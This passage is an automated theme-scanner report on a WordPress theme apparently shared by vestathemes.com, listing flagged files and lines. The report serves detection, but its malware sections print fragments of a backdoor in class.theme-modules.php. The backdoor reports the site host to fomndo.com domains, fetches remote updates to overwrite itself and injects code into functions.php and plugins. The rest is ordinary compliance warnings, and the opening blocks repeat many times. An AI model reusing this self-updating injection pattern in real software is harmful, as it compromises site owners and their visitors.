$new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOC
  9. Malware : Network operations curl_init was found in the file timthumb.php 1180: if(function_exists('curl_init')){1189: $curl = curl_init($url);curl_exec was found in the file timthumb.php 1199: $curlResult = curl_exec($curl);curl_init was found in the file TwitterAPIExchange.php 214: $feed = curl_init();curl_exec was found in the file TwitterAPIExchange.php 216: $json = curl_exec($feed);curl_init was found in the file instagram.class.php 443: $ch = curl_init();475: $ch = curl_init();curl_exec was found in the file instagram.class.php 457: $jsonData = curl_exec($ch);483: $jsonData = curl_exec($ch);curl_init was found in the file instagram.class.php 443: $ch = curl_init();475: $ch = curl_init();curl_exec was found in the file instagram.class.php 457: $jsonData = curl_exec($ch);483: $jsonData = curl_exec($ch);curl_init was found in the file social-counters.php 316: $ch = curl_init();curl_exec was found in the file social-counters.php 321: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 351: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 357: $data = curl_exec($ch);curl_init was found in the file class.theme-modules.php 413: $ch = curl_init();curl_exec was found in the file class.theme-modules.php 419: $data = curl_exec($ch);
  10. Admin menu : Themes should use add_theme_page() for adding admin pages. File addons.php : 65: add_menu_page(wp_get_theme(), wp_get_theme(), 'edit_theme_options', $this->File addons.php : 66: // add_submenu_page($this->page_slug, __('Addons', 'theme'), __('Addons', 'the68: add_submenu_page($this->page_slug, 'Plugins', 'Plugins', 'edit_theme_option71: add_submenu_page($this->page_slug, __('Install demos', 'online-shopping'), 75: //add_submenu_page($this->page_slug, 'System Status', 'System Status', 'edit_File addons.php : 66: // add_submenu_page($this->page_slug, __('Addons', 'theme'), __('Addons', 'the68: add_submenu_page($this->page_slug, 'Plugins', 'Plugins', 'edit_theme_option71: add_submenu_page($this->page_slug, __('Install demos', 'online-shopping'), 75: //add_submenu_page($this->page_slug, 'System Status', 'System Status', 'edit_File addons.php : 66: // add_submenu_page($this->page_slug, __('Addons', 'theme'), __('Addons', 'the68: add_submenu_page($this->page_slug, 'Plugins', 'Plugins', 'edit_theme_option71: add_submenu_page($this->page_slug, __('Install demos', 'online-shopping'), 75: //add_submenu_page($this->page_slug, 'System Status', 'System Status', 'edit_File addons.php : 66: // add_submenu_page($this->page_slug, __('Addons', 'theme'), __('Addons', 'the68: add_submenu_page($this->page_slug, 'Plugins', 'Plugins', 'edit_theme_option71: add_submenu_page($this->page_slug, __('Install demos', 'online-shopping'), 75: //add_submenu_page($this->page_slug, 'System Status', 'System Status', 'edit_File theme_options.php : 3378: 'page_parent' => 'momizat-dashboard', // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#ParametersFile welcome.php : 201: $page = 'add_management_page';File framework.php : 1347: // wrappers and need to be appened to using add_submenu_page.1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['tFile framework.php : 1347: // wrappers and need to be appened to using add_submenu_page.1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['tFile framework.php : 1424: $this->page = call_user_func( 'add_menu_page', $this->args['page_title'], $this->args['menu_title'], $thisFile framework.php : 1347: // wrappers and need to be appened to using add_submenu_page.1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['tFile class.theme-modules.php : 34: add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options', File class.theme-modules.php : 34: add_options_page( 'helload Plugin', 'helload', 'manage_options', 'helload',
  11. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was revslider.zip js_composer.zip layerslider.zip goodnews-shortcode-editor.zip envato-market.zip.
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in enqueue.php. Themes must not deregister core scripts. 215: wp_deregister_script( 'jquerySelect2' );Found wp_deregister_script in framework.php. Themes must not deregister core scripts. 565: wp_deregister_script( 'wpb_ace' );
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is goodnews-shared-by-vestathemes-com.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'woocommerce' in file review.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'woocommerce' in file cart-totals.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file news-elements.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments "Before add this widget you must make sure you fill all required data in theme options -> <a target='_blank' href='", >APIs Authentication</a>, "theme" in file social-counter.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'No Categories' in file main.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Invalid)' in file menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Pending)' in file menu.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move up' in file menu.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move down' in file menu.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Edit Menu Item' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'URL' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Navigation Label' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Title Attribute' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Open link in a new window/tab' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'CSS Classes (optional)' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Link Relationship (XFN)' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Description' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'The description will be displayed in the menu if the current theme supports it.' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Move' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Up one' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Down one' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'To the top' in file menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Original: %s' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Remove' in file menu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Cancel' in file menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file ajax-full.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments '% Comments' in file nb-sm.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Edit' in file breadcrumbs-plus.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Good news:' in file install.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Theme Version' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Current Version:' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WordPress Environment' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Home URL' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The URL of your site\'s homepage.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Site URL' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The root URL of your site.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WP Version' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The version of WordPress installed on your site.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WP Multisite' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Whether or not you have WordPress Multisite enabled.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WP Memory Limit' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The maximum amount of memory (RAM) that your site can use at one time.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s - We recommend setting memory to at least 128MB. To import Main demo data, 256MB of memory limit is required. See: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Increasing memory allocated to PHP' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your current memory limit is sufficient, but if you need to import Main demo content, the required memory limit is <strong>256MB.</strong>: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Increasing memory allocated to PHP' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WP Debug Mode' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Displays whether or not WordPress is in Debug Mode.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Language' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The current language used by WordPress. Default = English' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Server Environment' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Server Info' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Information about the web server that is currently hosting your site.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'PHP Version' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The version of PHP installed on your hosting server.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s - We recommend a minimum PHP version of 5.4. See: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'How to update your PHP version' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments "Couldn't determine PHP version because phpversion() doesn't exist." in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'PHP Post Max Size' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The largest filesize that can be contained in one post.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s - We recommend setting Post Max Size to at least 32.<br />See: <a href="%s" target="_blank">Increasing Max Post Size</a>' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'PHP Time Limit' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The amount of time (in seconds) that your site will spend on a single operation before timing out (to avoid server lockups)' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s - We recommend setting max execution time to at least 180. <br /> To import main demo content, <strong>300</strong> seconds of max execution time is required.<br />See: <a href="%s" target="_blank">Increasing max execution to PHP</a>' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Current time limit is sufficient, but if you need import main demo content, the required time is <strong>300</strong>.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'PHP Max Input Vars' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The maximum number of variables your server can use for a single function to avoid overloads.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s - Recommended Value: %s at least.<br />Max input vars limitation will truncate POST data such as menus. See: <a href="%s" target="_blank">Increasing max input vars limit.</a>' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'SUHOSIN Installed' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers on the one hand against a number of well known problems in PHP applications and on the other hand against potential unknown vulnerabilities within these applications or the PHP core itself. If enabled on your server, Suhosin may need to be configured to increase its data submission limits.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'MySQL Version' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The version of MySQL installed on your hosting server.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Max Upload Size' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The largest filesize that can be uploaded to your WordPress installation.' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Default Timezone is UTC' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The default timezone for your server.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default timezone is %s - it should be UTC' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Payment gateways can use cURL to communicate with remote servers to authorize payments, other plugins may also use it when communicating with remote services.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your server does not have fsockopen or cURL enabled - PayPal IPN and other scripts which communicate with other servers will not work. Contact your hosting provider.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Some webservices like shipping use SOAP to get information from remote servers, for example, live shipping quotes from FedEx require SOAP to be installed.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your server does not have the %s class enabled - some gateway plugins which use SOAP may not work as expected.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'HTML/Multipart emails use DOMDocument to generate inline CSS in templates.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your server does not have the %s class enabled - HTML/Multipart emails, and also some extensions, will not work without DOMDocument.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'GZip (gzopen) is used to open the GEOIP database from MaxMind.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your server does not support the %s function - this is required to use the GeoIP database from MaxMind. The API fallback will be used instead for geolocation.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Multibyte String (mbstring) is used to convert character encoding, like for emails or converting characters to lowercase.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Your server does not support the %s functions - this is required for better character encoding. Some fallbacks will be used instead for it.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Remote Post' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'theme and many plugins uses this method to communicate with different APIs, e.g. Google, Twitter, Facebook, Paypal.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'wp_remote_post() failed. PayPal IPN won\'t work with your server. Contact your hosting provider.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the 